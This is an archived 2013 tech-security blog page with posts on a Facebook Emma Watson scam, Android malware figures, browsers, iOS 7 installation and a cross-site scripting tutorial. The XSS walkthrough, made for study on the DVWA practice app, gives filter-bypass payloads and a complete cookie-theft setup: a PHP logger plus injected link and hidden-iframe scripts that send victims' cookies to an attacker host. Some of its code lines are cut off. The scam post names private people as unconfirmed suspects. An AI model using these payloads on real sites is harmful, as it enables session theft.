Sunday, 21 July 2013

Warning : Emma Watson scam worm spreading widely on Facebook

Spammers have now leveraged the popularity of Harry Potter's star Emma Watson in a Facebook scam that offering Sex tape of popular Hollywood movie star Emma Watson with a malicious link, actually spreading the malicious links and Porn images on infected user's profiles.
This isn't the first time Emma Watson has been used as the bait in a scam and it surely won't be the last. The worm hitting Facebook Profiles and Groups with post of malicious porn link and tagging others too in same  post.
Spammers are abusing Google Translate and Short url services to keep their links unblocked by Facebook's automated malware scanner. Click that link will redirect user to a webpage asking for "Age Verification" , as shown below:
Website will ask user to follow some step, before offering the video. In Step one asking them to Click a link, that will be used in Step two and three for generating an activation code. Once user will click "Activate", he will be redirect to another page and his Facebook Profile will get logout automatically.

In meantime, the virus will spread on victim's profile and automatically will post same Emma Watson scam post on their wall, tagging 12-15 friends on the comments. This new post will them offer same video and steps to others.

The people who are running this scam are earning huge money from advertising networks. We just tried to find out the people behind this website,as following:

1.) Open the source code of the scam page, asking for "Age Verification", In hidden form inputs a Google Adsense publisher ID is mentioned i.e "pub-0820544532937748". Google Adsense offer web admins to earn money by placing advertisements on their websites. That means, culprit behind the scam is using Google adsense on all his website with given Publisher ID.

2.) There are many online tools available,that offer you to search all the websites using same Google Adsense Publisher ID i.e

3.) All above listed websites are owned by our suspected Cyber Criminal, who is offering fake Emma Watson video and spreading malware to earn money from advertisements.

4.) I open all above sites and found that 5 out of them are Displaying Google Ads on them with same Publisher ID. Then I check the domain registration details and found that majority of domains are owned by an Italian guy name - "Walter Coraccio" i.e
5.) Further i tried to check out the source code of these sites and found two interesting meta tags
6.) These meta tags are actually used to defined the site's owner and Facebook Page. In this case, website owner is OR , name : Dev Banzai , an Italian web developer with few post and two friends in his profile, who are also web developers.

We are not confirming that these developers are really behind this fast spreading Facebook scam worm or not ? Or may be they are just own the Hosting web service where this malware script is hosted. But You should never click on a link that appears on your Facebook page with some malicious content, either its from someone you know.

Tuesday, 16 July 2013

92% of Android Application Found Under Malicious Attacks

Smartphone and Mobile malware are in cutthroat competition but if we look at the figures of last year, we reveal that mobile malware is leading than Smartphone makers. The third annual Mobile Threat report shows that during March 2012 to march 2013, mobile malware shoots at 614% with a 276259 malicious apps in mobile market, which shows a 155% increase in malicious apps. According to Juniper report, which is grounded on an analysis of more than 1.85 million mobile apps and vulnerability over different mobile operating systems (OS)?
The usage of OS is increasing; cybercriminals are becoming active. They target operating systems instead of cracking individual system. The report also revealed that Android is the most infected OS that carries 92% of all founded threats.
According to Canalys 2013, report Android dominates 59.5% market share in mobile apps where Apple was on the second position with a 19.3% and Microsoft is holding with an 18.1% market share.

The reason behind prevailing mobile malware on Android platform is not using updated android version. A report says that only 4% users were using updated android version. Mostly users use Gingerbread and Ice cream sandwich so they lack new security updates from Google. That does not mean that other operating systems like Apple iOS are not vulnerable.

The majority malware targets SMS, which were sent out unknown numbers set out by cybercriminals. The report said:

  • 48% SMS Trojans recorded for malware attacks.
  • 29% malware spreads due to fake installations.
  • 19% malware came from Trojan Spy malware.

Major apps infected by cybercriminals are Google Play, Skype, Adobe Flash, and Angry Birds, Bad Pigs.
To minimize the risk of OS malware, users should have latest update OS version, never install app through third party, do not allow personal information on your device.
The Juniper report focuses on four indicators like increase in malware target, increase in third party downloads, holes in mobile payments, and fragmentation.

  • In 2010, the count for Android malware was around 24%
  • In 2011, the Android malware figure augmented to 47%
  • In 2013, the Android malware figure grew to 92%
  • More than 500 third party Android app stores carry mobile malware.
  • Three out of five third party stores are from China and Russia.
  • Less sophisticates mobile criminals focus on mobile payments via SMS Trojans and fake installers. According to report, they earn $10 on each download.
  • 77% of Android malware came from SMS threat.

The Canalys report said that there is probably expectation of 1 billion of Android smartphones to dispatch in 2017. The reason behind prevailing Android malware is its open friendly ecosystem for apps and developers. Google has to work a lot to draw people to its Android version and make free them from mobile malware. Google need enhanced protection for mobile users and organizations and OEMs and software vendors must work in a focused way to lessen mobile threats and vulnerabilities.

About The Author

Abel Wike lives in Delaware, USA. Head of fraud prevention division; she has four years experience on online security activities at She recommends, use GeoTrust Anti Malware Scan to make malware free website.

Friday, 12 July 2013

Chrome vs. Explorer: Which Should You Be Using?

Choosing an Internet browser might not seem like a big decision, but in some cases it can determine the speed of not only your browsing, but your entire computer performance. The right browser will depend in part on what you want to use it for. If you are only an infrequent browser who needs to check his email, nearly any browser will appear equal to the next. However, in some cases one browser might offer a better match for your needs. Google Chrome and Internet Explorer are two browsers commonly used on both Mac and PC machines. Here is a quick break down of some key differences to help you decide which one is best for you.


Chrome regularly beats the competition when it comes to the speed of opening and operating the browser, or a new tab within the same browser window. If speed is your utmost concern, you will save more time using Chrome than Explorer. In fact, some studies show that with as many as nine active tabs, Chrome will load twice as fast as Explorer. While this boils down to just a few seconds' difference, over the course of a day it may add up to a lot of time saved if you're browsing for hours at a time.


You can view a PDF on both Chrome and Explorer browsers, but Explorer has native support, which means you don't need to download anything additional to view your PDF documents. If you are using Chrome, you will need to manually add an Adobe download before you view the same files. Explorer also supports more PDF features without the need of additional add-ons, such as viewing PDF thumbnails, page numbers, and page search.


Google Chrome and Internet Explorer both offer the ability to add extensions, also called add-ons, to accomplish features that are not native to the browser. For instance, you might want to combine your social media accounts in one gadget. While Google Chrome as an expanding store where you can download new extensions, Internet Explorer relies mostly on third-party add-ons that are downloaded from around the Internet. In either browser, an add-on can be removed once it's downloaded so you're not stuck with it forever.


Both Chrome and Explorer offer private browsing. Chrome calls it incognito browsing, while Explorer simply refers to it as private browsing. When in this mode, your browsing history won't be saved to the previously visited site memory that is stored on your machine. On both Chrome incognito browsing, and Explorer private browsing, the cookies are not stored so you leave less even less of a trace.

Both Chrome and Explorer Internet browsers are free, so if you try one and decide that it's not right for you - you can easily switch to the other. You can even import your bookmarks between the Web browsers. Be aware, however, that each browser will occupy space on your hard drive. If you're low on memory, uninstall the browser that you're not using to make room for more files and programs.

About The Author:
Dennis McIntosh is an SEO junkie. He loves writing about all things search and browser based on tech blogs.

Wednesday, 10 July 2013

Complete Cross-site Scripting Walkthrough


'XSS' also known as 'CSS' (Cross Site Scripting) is a very common vulnerability found in Web Applications, 'XSS' allows the attacker to inject malicious code , the reason of that is the developer trusts user inputs, or mis filtering issues ,then send back user input data to the client browser so the malicious code will execute.

XSS is Dangerous

 XSS is really dangerous , it's severity is High, because it could change the website DOM and could
lead to stealing credentials of the administrator , in these cases the attacker can control and
compromise the whole application.

What does the attacker want to achieve?

• Changing Setting
• Cookie theft
• False Advertising
• Steal a Form Tokens to make CSRF Easier
• And more , you have to be creative to exploit XSS.

XSS Type

There are Three Types of XSS
• Persistent (Stored) XSS
◦ Attack is stored on the website,s server
• Non Persistent (reflect) XSS
◦ user has to go through a special link to be exposed
• DOM-based XSS
◦ problem exists within the client-side script
we will discuss each kind of these in details , as you will see.

Persistent (Stored) XSS

wikipedia definition :The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on "normal" pages returned to other users in the course of regular browsing, without proper HTML escaping. A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read. Simply Persistent XSS is occurs when the developer stores the user input data into database server or simply writing it in a file without a proper filtration , then sending them again to the client browser.

Persistent (Stored) XSS Demo

Here is a PHP code that suffers form Persistent XSS:

// Sanitize message input
$message = stripslashes($message);
$message = mysql_real_escape_string($message);
// Sanitize name input
$name = mysql_real_escape_string($name);
$query = "INSERT INTO guestbook (comment,name) VALUES (
$result=mysql_query($query) or die('<pre>'.mysql_error().'</pre>');

the two parameters in that code “message” and “name” are not sanitized properly ,the ,we store these parameters into the guestbook table, So when we displaying these parameters back the client browser, it will execute the malicious JavaScript code. For Demonstrating this we will exploit DVWA application.

After Submitting this form , Our JS code has been executed

Non Persistent (Reflected) XSS

The non-persistent (or reflected) cross-site scripting vulnerability is by far the
most common type. These holes show up when the data provided by a web client, most commonly in HTTP query parameters or in HTML form submissions, is used immediately by server-side scripts to generate a page of results for that user, without properly sanitizing the request.

Non Persistent (Reflected) XSS Demo

Here is a php code that suffers form Reflected XSS


if(!array_key_exists("name",$_GET) | |$_GET['name'] == NULL || $_GET['name']==''){
echo '<pre>';
echo 'Hello' . $_GET['name'];
echo '</pre>';

AS you can see that the “name” parameter doesn't sanitized and echo back to the user , so when the user inject a malicious JS code , It will execute. Now we will inject our malicious js Code , For demonstrating we will inject

<script>alert(/xss/)</script> For Demonstrating this we will exploit DVWA application

will inject an alert box Code “<script>alert("xss")</script>

DOM based XSS

DOM-based vulnerabilities occur in the content processing stages performed by the client, typically in client-side JavaScript. The name refers to the standard model for representing HTML or XML contents which is called the Document Object Model (DOM) JavaScript programs manipulate the state of a web page and populate it with dynamically-computed data primarily by acting upon the DOM.

simply that type occurs on the javascript code itself that the developer use in client side for example

         "A typical example is a piece of JavaScript accessing and extracting data from the URL via the
location.* DOM, or receiving raw non-HTML data from the server via XMLHttpRequest, and then using this information to write dynamic HTML without proper escaping,entirely on client side."

DOM based XSS Demo

Suppose the following code is used to create a form to let the user choose his/her preferred language. A default language is also provided in the query string, as the parameter “default”. we will use the following code for demonstration purposes:


document.write("<OPTION value=1>"+document.location.href.substring
document.write("<OPTION value=2>English</OPTION>");

The page is invoked with a URL such as:
A DOM Based XSS attack against this page can be accomplished by sending the following URL to
a victim:<script>alert(document.cookie)</script>
The original Javascript code in the page does not expect the default parameter to contain HTML
markup, and as such it simply echoes it into the page (DOM) at runtime. The browser then renders
the resulting page and executes the attacker’s script:
Now we've discussed all types of XSS , so lets talk about some advanced techniques.

Advanced Techniques
there are some avoidance Techniques can be taken to protect a against XSS exploits but they are not
implementing well for example :
Tons of sites may seem vulnerable but not executing the code that occurs because some kind of
filtration methods and those may can be bypassed ,we will demonstrate most of them.

METHOD 1 : replace <script> with null string ""
here is the vulnerable code that suffers from reflected xss , that has a filtration :


if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){
$isempty = true;
} else {
echo '<pre>';
echo 'Hello ' . str_replace('<script>', '', $_GET['name']);
echo '</pre>';
as you can see ,in the previous code , the developer replace the string that called "<script>" with
a Null string "" .
Some common methods to bypass filteration is that you just have to replace the string "<script>"
with "<SCRIPT>" because the developer search for lowercase of "<script>" , so we bypass
it by change our script to <SCRIPT>.......</SCRIPT>
Here is an other way to bypass the previous filteration

<script type=text/javascript>alert("XSS")</script>

Please note its bad practice to use alert("XSS") to test for XSS because most of known sites block
the keyword XSS before.
METHOD 2 : magic quotes filtration
in this Technique , the developer uses technique that called magic quotes filtration ,by using
a PHP function called "addslashes()" that add slash before any special chars. So Our traditional
JavaScript code doesn't work
there are many ways to bypass that filter , we will discuss two of them
1- the easiest way to bypass it is Just DONT USE magic quotes simple is that , for example
declaring a variable and assigned , it to a number , then alert that variable.
AS you can see here: <script>var val= 1; alert(val)</script>
2- this way is some what tricky , in this way we use a built-in Function that convert Decimal values
into ASCII values , you can find a complete table of ASCII here
this will help you write what you want OR you can use hackbar firfox add-ons to help you on
converting ASCII to decimal In my examples ill be writing "XSS" this is the following code
"120 115 115", Ok we now got the Decimal value of our string,we need to know what function I
n javascript converts this to ASCII this function called "String.fromCharCode()",and to use this with
alert as example , you dont need to use quotes any more.
<script>alert(String.fromCharCode(120, 115, 115)</script>
Ok now this will display or message in this case "XSS", this method is very useful for bypassing
magic quotes.

How Can an Attacker Steal cookies?
At first glance you hear about Stealing Cookies , you may think it need a hard work to
implement or even to understand , but i tell you that is so simple , just you will need
some programming background and XSS Vulnerability ,Simple is that .
the Scenario of stealing cookie is that , We will create a PHP file called collect_cookie.php
then we will upload it to any webhosting company , after that we will inject a java script
code that will send Cookies to our malicious website , When the php file recieve the
Cookie information , it will save it in afile called stolen_cookie.txt
To can steal cookie , we need to some issues :
• A PHP Script that will recieve the cookie
• the javascript code that will steal the cookie and send it to our malicious site
• a web hosting company that will host our php file

First : collect_cookie.php
Here is the PHP script that will use, to collecting Cookie and save them into stolen_cookie.txt


$date=date("l ds of F Y h:i:s A");
fwrite($file,"DATE:$date || USER AGENT:$user_agent || COOKIE:$cookie \n");
echo '<b>Sorry , this page is under construction</b></br></br>Please Click<a
href="">here</a> to go back to previous page ';

So lets understand what the script will do :
in this line we will store the data that is stored in a get variable called cookie then
store it in avariable called collectedCookie
$date=date("l ds of F Y h:i:s A");
here we store the date of the connection Occurs , it tells us when these cookies have been


here we store the user_agent of the victim for further attacks if it needs to.


here we create a file called stolen_cookie.txt that has victim's cookie information

fwrite($file,"DATE:$date || USER AGENT:$user_agent || COOKIE:$collectedCookie \n");
here we save the data as this format (“DATE: || USER AGENT || COOKIE”)

her we close the file handle

echo '<b>Sorry , this page is under construction</b></br></br>Please Click<a
href="">here</a> to go back to previous page ';
here we print message on the screen (“Sorry , this page is under construction”)

and give him a link to click on it that send it to google.
Here we have finished the first filecthat will collect the cookie information
Second : javascript code
Here is the JavaScript code that we will inject into the victim server or browser.
We can inject any one of these scripts :

<a onclick="document.location='

cookie='+escape(document.cookie);" href="#">Click here for Details</a>

this script need user interaction because it print a link to the user , if the user
clicks on that link ,the redirection to our site with the cookie information will be

<iframe width='0' height='0' frameborder='0'

cookie='+escape(document.cookie);</script>' />

This script doesn't need user interaction ,here we will inject an iframe in the
victim website and it's hidden so the victim can't see that ,and the connection
will be done.
Finally we will find the cookie by browsing the file that called stolen_cookie.txt

Article By SOG

Saturday, 6 July 2013

How to get or get rid of iOS 7 Beta?

To the delight of fanatic Apple users, the giant company released the beta version of the brand new and advanced iOS 7. But before you jump to test the rivers, we should offer a word of caution that although Apple has a reputation for releasing the ever so polished beta versions, the latest iOS 7 might just be battery hungry and a kin of bug-bunny. Hence, do not use it for your daily devices.

Quite the claims of certain developers that if you download the iOS 7, there is no turning back, we would like you to know that you can easily restore back to iOS 6, if you dint so much like the iOS 7. Read below if you wish to know the bullet proof way to upgrade to or downgrade from the iOS 7.

Installing iOS 7

What you require?
  • Before upgrading the system to iOS 7, you would need an access to iOS developer account
  • A fifth generation iPod Touch, or iPhone 5, 4S or 4
  • The model number of the device and it’s UDID – unique device identifier
  • Computer with the latest update of iTunes installed
  • IPSW file of iOS 7 beta
  • iOS 6 IPSW file, if you require restoring a stable version
How to install iOS 7 beta?

Log in to the iOS developer account and download the install files required for the process. Note: only grab those files which are required for your specific device and model number. The iOS 7 beta will be packaged as .dmg file, up for download; also, it will be wise to download a stable version of iOS 6 simultaneously. The installation requires you to register the UDID lest the download won’t work.
Now, open the .dmg file of iOS 7. It should swell itself automatically if you are a Mac user. The Windows users are required to extract the .jpsw file residing inside the .dmg one.
Once through, connect the device with computer and if an automatic launch does not take place, access it by the iPhone dialog in iTunes. Also, at this stage perform a backup manually by clicking “Back Up Now” as the installation will wipe off the storage of the device, and the backup would be required to restore the same.
If you have followed this far, now only the installation process is left. If you are a Mac user, just press the Option key and click “Restore iPhone”. Windows users should press the Shift key instead, and open the iOS 7 .jpsw file extracted earlier. Click Restore, when the system asks for a confirmation for restoring the devices. This might take some time, so be patient.
Lastly, after the installation and the restarting of your phone, you will be given the option to set your phone anew or restore an existing backup. If you want to restore the backup, stay connected to iTunes and access the backup created earlier.

Downgrading back to iOS 6

Now, if the new iOS 7 keeps giving you an uncomfortable itch, each time you unlock the phone or open the devices, you can easily change it back to iOS 6. Here’s how:
…Before we begin, are you certain?
There is a limitation with trying to downgrade the system back to iOS 6 and we would like you to be certain prior to initiating the process. The downgrading will only get you to the latest version update of iOS, i.e. 6.1.4 for iPhone 5 users and 6.1.3 for iPhone 4S. Besides, you will not be able to use iOS 7 backup on an iOS 6 device, and would not be able to recover any jailbreaks. If you still want to continue, read ahead:
How to downgrade to iOS 6 from iOS 7
Start with downloading the most recent firmware file from Our Downloads and save it on a place easy to access, perhaps the desktop. Then launch iTunes on your Mac or PC.
Now, plug in your device and put it in DFU mode. Ensure that the screen is not connected to iTunes but is black instead, which confirms the DFU more. You will get a pop up message saying “the device can't be used until it's restored.” Click Ok and continue.
Now, press hold of the Alt / Option key (or the Shift key for the PC users) and click on Restore iPhone in iTunes. Reach the firmware file saved in first step and click open. Now, let iTunes take care of the rest and if you have done everything right, you will get back to your iOS 6 in no time.
Done successfully with upgrading or downgrading the iOS? Share your experiences with us in the comments below.

About The Author:

Rick Brown is an acclaimed tech blogger, who provides consulting services to new bie entrepreneurs for iPhone Apps Development services - He simply suggests his clients to hire iPhone developers from expert agencies for high-end development.